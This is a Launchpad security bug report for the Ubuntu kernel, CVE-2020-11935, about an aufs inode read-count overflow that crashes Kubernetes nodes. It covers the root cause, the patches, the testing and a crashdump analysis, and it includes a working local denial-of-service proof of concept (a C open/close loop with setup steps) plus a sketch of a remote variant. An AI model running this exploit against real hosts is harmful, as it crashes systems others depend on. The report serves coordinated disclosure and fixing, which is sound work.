kernel panic hit by kube-proxy iptables-save/restore caused by aufs

Bug #1873074 reported by Mauricio Faria de Oliveira
272
This bug affects 1 person
Affects Status Importance Assigned to Milestone
linux (Ubuntu)
Fix Released
Medium
Mauricio Faria de Oliveira
Xenial
Fix Released
Medium
Mauricio Faria de Oliveira
Bionic
Fix Released
Medium
Mauricio Faria de Oliveira
Eoan
Won't Fix
Medium
Mauricio Faria de Oliveira
Focal
Fix Released
Medium
Mauricio Faria de Oliveira
Groovy
Won't Fix
Medium
Mauricio Faria de Oliveira

Bug Description

[Impact]

 * Systems with aufs mounts are vulnerable to a kernel BUG(),
   which can turn into a panic/crash if panic_on_oops is set.

 * It is exploitable by unprivileged local users; and also
   remote access operations (e.g., web server) potentially.

 * This issue has also manifested in Kubernetes deployments
   with a kernel panic in iptables-save or iptables-restore
   after a few weeks of uptime, without user interaction.

 * Usually all Kubernetes worker nodes hit the issue around
   the same time.

[Fix]

 * The issue is fixed with 2 patches in aufs4-linux.git:
 - 515a586eeef3 aufs: do not call i_readcount_inc()
 - f10aea57d39d aufs: bugfix, IMA i_readcount

 * The first addresses the issue, and the second addresses a
   regression in the aufs feature to change RW branches to RO.

 * The kernel v5.3 aufs patches had an equivalent fix to the
   second patch, which is present in the Focal aufs patchset
   (and on ubuntu-unstable/master & /master-5.8 on 20200629)

 - 1d26f910c53f aufs: for v5.3-rc1, maintain i_readcount
   (in aufs5-linux.git)

[Test Case]

 * Repeatedly open/close the same file in read-only mode in
   aufs (UINT_MAX times, to overflow a signed int back to 0.)

 * Alternatively, monitor the underlying filesystems's file
   inode.i_readcount over several open/close system calls.
   (should not monotonically increase; rather, return to 0.)

[Regression Potential]

 * This changes the core path that aufs opens files, so there
   is a risk of regression; however, the fix changes aufs for
   how other filesystems work, so this generally is OK to do.
   In any case, most regressions would manifest in open() or
   close() (where the VFS handles/checks inode.i_readcount.)

 * The aufs maintainer has access to an internal test-suite
   used to validate aufs changes, used to identify the first
   regression (in the branch RW/RO mode change), and then to
   validate/publish the patches upstream; should be good now.

 * This has also been tested with 'stress-ng --class filesystem'
   and with 'xfstests -overlay' (patch to use aufs vs overlayfs)
   on Xenial/Bionic/Focal (-proposed vs. -proposed + patches).
   No regressions observed in stress-ng/xfstests log or dmesg.

[Other Info]

 * Applied on Unstable (branches master and master-5.8)
 * Not required on Groovy (still 5.4; should sync from Unstable)
 * Required on LTS releases: Bionic and Focal and Xenial.
 * Required on other releases: Disco and Eoan (for custom kernels)

[Original Bug Description]

Problem Report:
--------------

An user reported several nodes in their Kubernetes clusters
hit a kernel panic at about the same time, and periodically
(usually 35 days of uptime, and in same order nodes booted.)

The kernel panics message/stack trace are consistent across
nodes, in __fput() by iptables-save/restore from kube-proxy.

Example:

"""
[3016161.866702] kernel BUG at .../include/linux/fs.h:2583!
[3016161.866704] invalid opcode: 0000 [#1] SMP
...
[3016161.866780] CPU: 40 PID: 33068 Comm: iptables-restor Tainted: P OE 4.4.0-133-generic #159-Ubuntu
...
[3016161.866786] RIP: 0010:[...] [...] __fput+0x223/0x230
...
[3016161.866818] Call Trace:
[3016161.866823] [...] ____fput+0xe/0x10
[3016161.866827] [...] task_work_run+0x86/0xb0
[3016161.866831] [...] exit_to_usermode_loop+0xc2/0xd0
[3016161.866833] [...] syscall_return_slowpath+0x4e/0x60
[3016161.866839] [...] int_ret_from_sys_call+0x25/0x9f
"""

(uptime: 3016161 seconds / (24*60*60) = 34.90 days)

They have provided a crashdump (privately available) used
for analysis later in this bug report.

Note: the root cause turns out to be independent of K8s,
as explained in the Root Cause section.

Related Report:
--------------

This behavior matches this public bug of another user:
https://github.com/kubernetes/kubernetes/issues/70229

"""
I have several machines happen kernel panic,and these
machine have same dump trace like below:

KERNEL: /usr/lib/debug/boot/vmlinux-4.4.0-104-generic
...
PANIC: "kernel BUG at .../include/linux/fs.h:2582!"
...
COMMAND: "iptables-restor"
...
crash> bt
...
[exception RIP: __fput+541]
...
#8 [ffff880199f33e60] __fput at ffffffff812125ac
#9 [ffff880199f33ea8] ____fput at ffffffff812126ee
#10 [ffff880199f33eb8] task_work_run at ffffffff8109f101
#11 [ffff880199f33ef8] exit_to_usermode_loop at ffffffff81003242
#12 [ffff880199f33f30] syscall_return_slowpath at ffffffff81003c6e
#13 [ffff880199f33f50] int_ret_from_sys_call at ffffffff818449d0
...

The above showed command "iptables-restor" cause the kernel
panic and its pid is 16884,its parent process is kube-proxy.

Sometimes the process of kernel panic is "iptables-save" and
the dump trace are same.

The kernel panic always happens every 26 days(machine uptime)
"""

<< Adding further sections as comments to keep page short. >>

Tags: patch sts

CVE References

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Security Impact:
---

The root cause of this problem can be easily exploited
by unprivileged users, both local and remote attackers.

It only needs access to an aufs mount point with read
permissions to any file; opening it in read-only mode,
repeatedly.

For that reason, probably sending the patch for this,
even if keeping it low profile and boring on wording,
may reveal enough information to exploit the problem,
and probably needs some care taking and coordination.

Details in 'Exploit / Local' (and Remote) sections.

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Security Impact Surface:
---

For Kubernetes itself, this is less likely nowadays with
the move from aufs to overlayfs in Docker (which used to
be biggest driver for aufs AFAIK), and additionally, new
versions have kube-proxy call iptables-save/restore less.

The versions typically used in the Xenial timeframe (and
which may still be around) still have both (aufs default,
and kube-proxy calling iptables-save more frequently.)

Detailed version numbers for Docker/Kubernetes for that
information can be provided if needed.

...

For the root cause (i.e., independently of Kubernetes),

This affects any distribution which ships aufs filesystem
AND enables CONFIG_IMA (sufficient until the 5.3 kernel)
OR enables CONFIG_FILE_LOCKING (new with the 5.3 kernel);

(either CONFIG option enables i_readcount/that BUG_ON())

Ubuntu:
--

This is true for all supported Ubuntu releases (T/X/B/E/F),
which ships aufs in the kernel packages as a kernel module.

Debian:
--

This affects Debian too, which ships aufs-dkms to build it.

This is true for Debian Stretch (oldstable) with 4.9 kernel.

This is not, for Debian Buster (stable) with the 4.19 kernel
(as CONFIG_IMA was disabled on 4.16 in Debian, g82596c5122fe)

BUT buster-backports has 5.4 kernel; so if aufs-dkms goes on
to support it, the problem would be exposed on Debian Buster.

This is true for Debian Bullseye (testing), again pending on
support from aufs-dkms, it is currently locked to 5.2 kernel,
via this DKMS directive (BUILD_EXCLUSIVE_KERNEL="^5.2.*").

Other Distros:
--

Apparently the official support for aufs is not too present
on other distros as it's not in the upstream/mainline Linux,
but there are distro-community efforts that provide it.
- Arch Linux User Repository/AUR
- CentOS community/custom packages on top of
  kernel-lt (longterm) and kernel-ml (mainline) stable pkgs.

Those were not checked.

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Root Cause:
----------

Note: this is completely independent of Kubernetes.

The aufs filesystem calls i_readcount_inc() when opening a
file in read-only mode, not paired with an i_readcount_dec().

@ fs/aufs/vfsub.c

struct file *vfsub_dentry_open(struct path *path, int flags)
{
    struct file *file;

    file = dentry_open(path, flags /* | __FMODE_NONOTIFY */,
                       current_cred());
    if (!IS_ERR_OR_NULL(file)
        && (file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
            i_readcount_inc(d_inode(path->dentry));

    return file;
}

That is _incorrect_ as only the VFS layer should maintain
the 'struct inode.i_readcount' value.

Neither of i_readcount_inc() or i_readcount_dec() should
happen there. They don't exist out of VFS on Linux tree.

So,

If the same file is opened in read-only mode so many times,
its backing inode.i_readcount value overflows back to zero.

Once that happens, when the file is closed, __fput() calls
i_readcount_dec(), and that will trigger the BUG_ON().

That causes a kernel panic/crash if panic_on_oops is set;
otherwise, just kernel messages.

By default it's not, but usually the 'enterprise'/larger
users set it so to save kernel crashdumps on such errors.

See the 'Problem Demonstration / Instrumentation' section
to watch the number to overflow and hit the BUG_ON/panic.

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Workaround:
---

Clean the inode cache, which should remove the inode from
memory, and when it's needed again, it's initialized with
i_readcount zero.

$ echo 2 | sudo tee /proc/sys/vm/drop_caches

This may happen indirectly from time to time on systems,
as part of normal memory cleansing/reclaiming, and thus
the problem might be avoided or never noticed.

This might impact performance, as the inode and dentry
caches are flushed.

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Fix:
---

Patch attached ("aufs-do-not-call-i_readcount_inc.patch").

This applies to Ubuntu kernels, aufs upstream, and other
distros's aufs (e.g. Debian aufs-dkms package.)

Attached analysis of the aufs change back in Linux v2.6.39
that introduced the problem ("aufs-intro-i_readcount_inc"),
explaining what happened and why that change is incorrect.

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :
Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Regression Testing:
---

The fix ran through regression testing with three tools.

No regressions observed between original/patched 5.4.0-21.
- 5.4.0-21-generic #25-Ubuntu SMP Sat Mar 28 13:10:28 UTC 2020
- 5.4.0-21-generic #25+aufs SMP Fri Apr 3 12:09:29 -03 2020

1) stress-ng (on host, and on kube-proxy's aufs mount)

Command: stress-ng --class filesystem --sequential 0 --timeout 5m
(takes about 3 hours to finish.)

The stress-ng logs were normalized for PID/process number
and unique messages then compared. There's no unexpected
new error messages. Also compared the dmesg output.

The runs on the kube-proxy's aufs mountpoint consisted
of finding which /var/lib/docker/aufs/mnt/ directory
is used by kube-proxy (which triggered the problem)
and running stress-ng over there.

2) xfstests-dev, patched to use aufs instead of overlayfs

The xfstests-dev patch is attached ("xfstests-aufs.patch").
It's not yet upstream -- working on v2 for upstream which
also covers fuse-overlayfs.

The set of test failures is identical for original/patched
kernels, seen as one single unique line across the 2 logs:

$ grep -h '^Failures:' xfstests.{orig,patch}.log | sort -u | wc -l
1

And the number of failures is (of course, identical.)

"Failed 357 of 648 tests."

Command: "./check -overlay -E /tmp/exclude-tests" with
10 tests excluded, which hang the kernel/blocks tasks.
(steps/details available in the patch message.)

3) smoke test for aufs (from the kernel team)

The smoke test for aufs from the kernel team is located at:
https://kernel.ubuntu.com/git/ubuntu/autotest-client-tests.git/tree/ubuntu_aufs_smoke_test/ubuntu_aufs_smoke_test.sh

Its output is identical on original/patched kernel.

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Exploit / Local:
---

The local exploit is trivial as 'mount | grep aufs' says
whether there's an aufs mountpoint, and usually there is
a file that is 'chmod o+r' that any user could read/open.

(This crashed a virtual machine in 8 hours, overnight.)
See section 'Exploit / Local' below.

Code:

    $ cat <<EOF >exploit.c
    #include <fcntl.h>
    #include <unistd.h>
    int main() { while (!close(open("test", O_RDONLY))); return 0; }
    EOF

    $ gcc -o /tmp/exploit exploit.c

Setup:

    $ mkdir dir mnt
    $ touch dir/test
    $ sudo mount -t aufs -o br=dir none mnt

    $ ls mnt
    test

Run:

    $ cd mnt && /tmp/exploit
    <just let it run until..>

    [29167.866016] kernel BUG at include/linux/fs.h:2963!
    [29167.867423] invalid opcode: 0000 [#1] SMP PTI
    [29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
    [29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
    [29167.873202] RIP: 0010:__fput+0x25d/0x260
    ...
    [29167.901583] Call Trace:
    [29167.902387] ____fput+0xe/0x10
    [29167.903344] task_work_run+0x8f/0xb0
    [29167.904420] exit_to_usermode_loop+0x131/0x160
    [29167.905749] do_syscall_64+0x163/0x190
    [29167.906929] entry_SYSCALL_64_after_hwframe+0x44/0xa9
    ...
    [29167.967808] Kernel panic - not syncing: Fatal exception

(uptime = 29167 seconds / 3600 seconds/hour = 8.10 hours)

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Exploit / Remote:
---

The remote exploit is possible if such file is opened in
response to an event, for example, a web server document
stored in an aufs mountpoint.

This obviously takes more time - each i_readcount_inc() is
delayed by a remote access - but it may be sped up by many
attackers, say a DDoS, if it's possible to figure or brute
force which URLs lead to an aufs-backed file in the server.

(This can happen with Kubernetes/docker containers using
the aufs storage driver for container images for example,
with static document in the container image, and exposed
via a web server, say nginx, a very popular docker image.)

See the 'Problem Demonstration' section w/ this example.

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :
Download full text (7.0 KiB)

Problem Demonstration / Instrumentation:
---------------------------------------

This kprobe kernel module ("kmod-kprobe-fput.c") inserts a
probe on __fput(), and prints the i_readcount value before
before decrementing it, when a specified filename is found.
(usage/steps on header comments.)

    $ sudo insmod kmod-kprobe-fput.ko
    [ 315.625113] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 0)

The i_readcount value is only incremeted on reads, not writes:

    $ touch test
    [ 308.193058] file: test, fs type: ext4, inode readcount: 0

    $ > test
    [ 310.293847] file: test, fs type: ext4, inode readcount: 0

    $ cat test
    [ 312.667149] file: test, fs type: ext4, inode readcount: 1

    $ cat test
    [ 317.312413] file: test, fs type: ext4, inode readcount: 1

    $ cat test
    [ 319.223841] file: test, fs type: ext4, inode readcount: 1

It is decremented only when the file is closed:

    $ tail -f test &
    $ tail -f test &
    $ tail -f test &

    $ cat test
    [ 365.042632] file: test, fs type: ext4, inode readcount: 4

    $ kill %%
    [ 372.241224] file: test, fs type: ext4, inode readcount: 3

    $ kill %%
    [ 376.151455] file: test, fs type: ext4, inode readcount: 2

    $ kill %%
    [ 378.802151] file: test, fs type: ext4, inode readcount: 1

With aufs, there are 2 files/inodes, one in the virtual/aufs
filesystem, another in the (underlying) real/ext4 filesystem.
Then aufs handles/redirects the open/read/write calls to it.

    $ mkdir dir mnt
    $ touch dir/test
    $ sudo mount -t aufs -o br=dir none mnt

    $ ls mnt
    test

The problem is observable upfront: i_readcount for the real
inode/filesystem is extra incremented on the read-only open.

    $ cat mnt/test
    [ 453.819165] file: test, fs type: aufs, inode readcount: 1
    [ 453.819226] file: test, fs type: ext4, inode readcount: 2

    $ cat mnt/test
    [ 458.091550] file: test, fs type: aufs, inode readcount: 1
    [ 458.091599] file: test, fs type: ext4, inode readcount: 3

    $ cat mnt/test
    [ 463.165711] file: test, fs type: aufs, inode readcount: 1
    [ 463.165759] file: test, fs type: ext4, inode readcount: 4

Compare that with the non-aufs/ext4-only output above for
multiple cats ;-) - the inode's i_readcount on ext4 grows.

...

That kprobe was enabled during the 'Exploit / Local' run.

The logs show the i_readcount value incrementing until it
overflowed, when the BUG_ON()/panic happened, and crashed.

(The 'multiple' parameter only prints when i_readcount is
a multiple of its value, in unsigned type.)

    $ sudo insmod kmod-kprobe-fput.ko multiple=100000
    [ 1684.953480] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 100000)

    $ cd mnt && /tmp/exploit
    [ 1799.795277] file: test, fs type: ext4, inode readcount: 100000
    [ 1800.420418] file: test, fs type: ext4, inode readcount: 200000
    [ 1801.030687] file: test, fs type: ext4, inode readcount: 300000
    ...
    [ 2428.610831] file: test, fs type: ext4, inode readcount: 100000000
    ...
    [ 7909.385033] file: test, fs type: ext4, inode readcount: 1000000000
    ...
    [14191.533372] file: test, fs type: ext4, inode...

Read more...

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :
Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :
Download full text (16.0 KiB)

Crashdump Analysis:
------------------

Part 1) Where

The BUG_ON() in fs.h:2583 originates from i_readcount_dec().

This function decrements the struct inode.i_readcount field,
but first it checks if that got to zero before decrementing
(which indeed indicates a bug with the i_readcount balance.)

    2580 #ifdef CONFIG_IMA
    2581 static inline void i_readcount_dec(struct inode *inode)
    2582 {
    2583 BUG_ON(!atomic_read(&inode->i_readcount));
    2584 atomic_dec(&inode->i_readcount);
    2585 }

So, that happened: i_readcount_dec() found i_readcount to be
zero, which is not expected, and trigerred the BUG_ON() call.

This is indeed called from __fput():

    187 static void __fput(struct file *file)
    ...
    217 if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
    218 i_readcount_dec(inode);

From the crashdump, we can confirm that i_readcount (value
in the EAX register) is indeed zero, and that jumps to ud2
(undefined/invalid opcode in BUG()) at offset 0x223 = 547.)

    crash> disass -x __fput
    ...
       0xffffffff81218ad2 <+418>: mov 0x154(%r13),%eax
       0xffffffff81218ad9 <+425>: test %eax,%eax
       0xffffffff81218adb <+427>: je 0xffffffff81218b53 <__fput+547>
    ...
       0xffffffff81218b53 <+547>: ud2

    crash> bt
    ...
        [exception RIP: __fput+547]
    ...
        RAX: 0000000000000000 RBX: ffff882a32191c00 RCX: 000000001b1a76dc
    ...

Part 2) What

Looking at which 'struct file' triggered this problem,
we have 'struct inode.i_readcount' at R13 + 0x154, so
inode is at R13 since i_readcount offset is 0x154.

    crash> struct -x -o inode.i_readcount
    struct inode {
      [0x154] atomic_t i_readcount;
    }

    crash> bt
    ...
        R13: ffff883f2ad40e90 R14: ffff887f6368d0a0 R15: ffff883f2ad0d200
    ...

So, inode = ffff883f2ad40e90

Checking the assembly for 'struct file', it's kept at RBx (above.)

So, file = ffff882a32191c00

And the inode pointer in file does match the value we have, good.

    crash> struct -x file.f_inode ffff882a32191c00
      f_inode = 0xffff883f2ad40e90

    Now, walking up the file's dentry chain, we get the path:

    crash> struct -x file.f_path.dentry ffff882a32191c00
      f_path.dentry = 0xffff883f2ad0d200

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f2ad0d200
      d_name.name = 0xffff883f2ad0d238 "protocols"
      d_parent = 0xffff883f42a33080

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f42a33080
      d_name.name = 0xffff883f42a330b8 "etc"
      d_parent = 0xffff883f5d747b00

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f5d747b00
      d_name.name = 0xffff883f4e892b50 "7e8d17d0d767bad43bbab4953b457660e2ad9d61162efd00261db0b36c1f7558"
      d_parent = 0xffff883f619cc480

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f619cc480
      d_name.name = 0xffff883f619cc4b8 "diff"
      d_parent = 0xffff883f619ccc00

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f619ccc00
      d_name.name = 0xffff883f619ccc38 "aufs"
      d_parent = 0xffff883f61930780

    crash> struct -x dentry.d_name.name,d_parent 0xffff883f61930780
      d...

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Analysis/history of the aufs change back in Linux v2.6.39.

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Patch for xfstests-dev to use aufs with the overlayfs suite.

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

I'm happy to send patches for Ubuntu releases if needed
(and Debian and aufs upstream, for that matter),

Just not yet aware which (private) mailing list/channel
should be used, and how/which coordination is required.

tags: added: sts
Revision history for this message
J. R. Okajima (hooanon05) wrote :

Mauricio,

Thank you for noticing me (as an upstream developer) and your thorough
analysis.
Your patch is good, but it didn't pass my local test. Because the test
has a case "branch manipulation: change the branch permission RW to RO."
The test is for an aufs specific feature which enables users to change
the permission of a branch (layer) dynamically. The one RW plus one or
more RO layers case is common, but users can have multiple RW layers and
change them into RO layers without unmounting aufs.

So I added another fix over yours and I am testing it now. It will take
several days.

Revision history for this message
J. R. Okajima (hooanon05) wrote : Re: [Bug 1873074] Re: kernel panic hit by kube-proxy iptables-save/restore caused by aufs

"J. R. Okajima":
> So I added another fix over yours and I am testing it now. It will take
> several days.

Ah, I should have written more.
"several days" in the above sentence means my regular test takes long
time. It doens't mean I can try your "multiple" parameter using kprobe
test. The test looks very effective, so if you can, please try it for
my patch in previous post. Obviously it does no harm unless you try
"mount -o remount,mod:/your/rw/branch=ro".

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Hi J. R. Okajima,

Good point. I recall that code path to change branches to read-only.

It's not exercised in the several tests I've done (for most common
scenarios.) Thanks for the additional testing.

It was a strong suspect early on, because it changes the underlying
inode's open file mode to read-only, and then an unbalance happens:

because the file was opened in read-write mode (no i_readcount_inc),
and after changed to read-only, on close it has is i_readcount_dec.

I remember the code having warnings that IMA messages could happen
if that is done in aufs; and possibly for this exact reason/change.

I'm not an aufs expert, but I think it's still wrong for aufs to
mess with the file mode of an already open file in the underlying
filesystem, and trying to remedy the failure as a result of that
by messing with the readcount again, under the covers.

Maybe another approach is to close the file if opened in RW mode,
and reopen in RO mode? so that the VFS continues to take care of
the i_readcount value, and aufs doesn't have to play tricks here.

(not sure if that is possible, i don't remember how aufs keeps
the access/syscalls from users of that file; but maybe it is
worth looking at it. -- and if it's too hard to do/not makes
sense, then maybe messing with the i_readcount under the hood
is what works for the time being. :)

Hope this helps,
Mauricio

Revision history for this message
J. R. Okajima (hooanon05) wrote :

Mauricio Faria de Oliveira:
> I'm not an aufs expert, but I think it's still wrong for aufs to
> mess with the file mode of an already open file in the underlying
> filesystem, and trying to remedy the failure as a result of that
> by messing with the readcount again, under the covers.

Aufs is an ordinaray filesystem which is a callee of VFS, at the same
time aufs is a caller of VFS for the branch/layer filesystems. So aufs
handles i_readcount on behalf of VFS.

> Maybe another approach is to close the file if opened in RW mode,
> and reopen in RO mode? so that the VFS continues to take care of
> the i_readcount value, and aufs doesn't have to play tricks here.

Re-open cannot be an option. It will destroy the file lock, file
position or any other file internal parameters.

J. R. Okajima

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Right, I think see your point. Even though it's an ordinary filesystem
as a callee of VFS, it is not as a caller (since most filesystems don't
do that), and in this role, it might have to do non-ordinary things too.

Thanks for clarifying that re-open is not an option. I imagined these
attributes were kept at the aufs file, and that the underlying fs file
was not that related. (as I mentioned, I'm not an aufs expert, nor fs
expert, for that matter.)

In general, i_readcount_inc/dec() outside of VFS is likely not the
"right" thing to do, but this particular case is far from "general"
(given the operation: to change an entire branch/layer RW->RO; and
being an union/layer filesystem; and while files are still open.)

... so I guess there is the "doable" thing to do, right? :)

Thanks for the patch!

Revision history for this message
J. R. Okajima (hooanon05) wrote :

Mauricio Faria de Oliveira:
> ... so I guess there is the "doable" thing to do, right? :)

Well, my local tests are still going on. If everything goes well, I'd
like to release this fix on next Monday (in my local timezone). If
security guys here want me to wait, let me know as soon as possible.

By the way, I've found there is a almost identical commit in aufs5
repositories.
 1d26f910c53fa 2019-08-03 aufs: for v5.3-rc1, maintain i_readcount

J. R. Okajima

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Hi J. R. Okajima,

> If security guys here want me to wait, let me know as soon as possible.

I'll mention that in the email thread we're all on.

Not sure if this is sufficient notice time for some,
as it's already weekend or really close on some TZs.

Hopefully it is, and the thinking is OK to release.

Revision history for this message
J. R. Okajima (hooanon05) wrote :

Mauricio Faria de Oliveira:
> Not sure if this is sufficient notice time for some,
> as it's already weekend or really close on some TZs.

I see.
Then I'll wait a few more days.

J. R. Okajima

Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

That should help; thank you!

Revision history for this message
Seth Arnold (seth-arnold) wrote :

Please use CVE-2020-11935 for the reference count issue.

Thanks

Revision history for this message
J. R. Okajima (hooanon05) wrote : Fwd: aufs4 and aufs5 GIT release (v5.7)

------- Forwarded Message

From: "J. R. Okajima" <email address hidden>
To: <email address hidden>
Subject: aufs4 and aufs5 GIT release (v5.7)
Date: Mon, 29 Jun 2020 10:32:38 +0900
Message-ID: <2412.1593394358@jrobl>

o news
- - linux-v5.7 is released. so is aufs5.7 branch.
  aufs5.8-rcN is not started yet.

o bugfix
- - do not call i_readcount_inc(), reported and fixed by Mauricio Faria de
  Oliveira.
- - related to above, fix IMA i_readcount.

J. R. Okajima

- ----------------------------------------
- - aufs4-linux.git
      aufs: bugfix, IMA i_readcount
      aufs: do not call i_readcount_inc()

- - aufs4-standalone.git
  ditto

- - aufs5-linux.git
  ditto

- - aufs5-standalone.git
  ditto

- - aufs-util.git
  nothing

------- End of Forwarded Message

Changed in linux (Ubuntu):
status: New → In Progress
Changed in linux (Ubuntu Bionic):
status: New → In Progress
importance: Undecided → Medium
assignee: nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Eoan):
status: New → Won't Fix
importance: Undecided → Medium
assignee: nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Focal):
status: New → In Progress
importance: Undecided → Medium
assignee: nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Groovy):
status: In Progress → Won't Fix
importance: Undecided → Medium
assignee: nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu):
importance: Undecided → Medium
assignee: nobody → Mauricio Faria de Oliveira (mfo)
description: updated
description: updated
description: updated
Changed in linux (Ubuntu Eoan):
status: Won't Fix → In Progress
description: updated
description: updated
description: updated
Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

[X/B/D/E][PATCH 0/2] aufs: fixes for CVE-2020-11935
https://lists.ubuntu.com/archives/kernel-team/2020-June/111578.html

[F/G/Unstable][PATCH 0/1] aufs: fix for CVE-2020-11935
https://lists.ubuntu.com/archives/kernel-team/2020-June/111581.html

Revision history for this message
Alex Murray (alexmurray) wrote :

This is public in the Ubuntu CVE Tracker so making the bug public too.

information type: Private Security → Public Security
tags: added: patch
Changed in linux (Ubuntu Bionic):
status: In Progress → Fix Released
Changed in linux (Ubuntu Focal):
status: In Progress → Fix Released
Changed in linux (Ubuntu Xenial):
status: New → Fix Released
importance: Undecided → Medium
assignee: nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Eoan):
status: In Progress → Fix Committed
Revision history for this message
Mauricio Faria de Oliveira (mfo) wrote :

Marking as fix released for X/B/F on kernel packages versions:
- Xenial: 4.4.0-186.216
- Bionic: 4.15.0-112.113
- Focal: 5.4.0-42.46

Covered in USNs:
https://usn.ubuntu.com/4425-1
https://usn.ubuntu.com/4426-1
https://usn.ubuntu.com/4427-1

Revision history for this message
Brian Murray (brian-murray) wrote :

The Eoan Ermine has reached end of life, so this bug will not be fixed for that release

Changed in linux (Ubuntu Eoan):
status: Fix Committed → Won't Fix
Revision history for this message
Peter Burkholder (peterburkholder) wrote :

This CVE still shows up as "Reserved" at https://nvd.nist.gov/vuln/detail/CVE-2020-11935 and https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11935.

Is there an approval/publication step that y'alls still need to take?

Thanks, Peter

Revision history for this message
Seth Arnold (seth-arnold) wrote : Re: [Bug 1873074] Re: kernel panic hit by kube-proxy iptables-save/restore caused by aufs

On Wed, Oct 21, 2020 at 10:32:14PM -0000, Peter Burkholder wrote:
> Is there an approval/publication step that y'alls still need to take?

Yes, there is; it's been a busy, uh, three months give or take.

Thanks for the friendly reminder. :)

Changed in linux (Ubuntu):
status: In Progress → Fix Released
To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.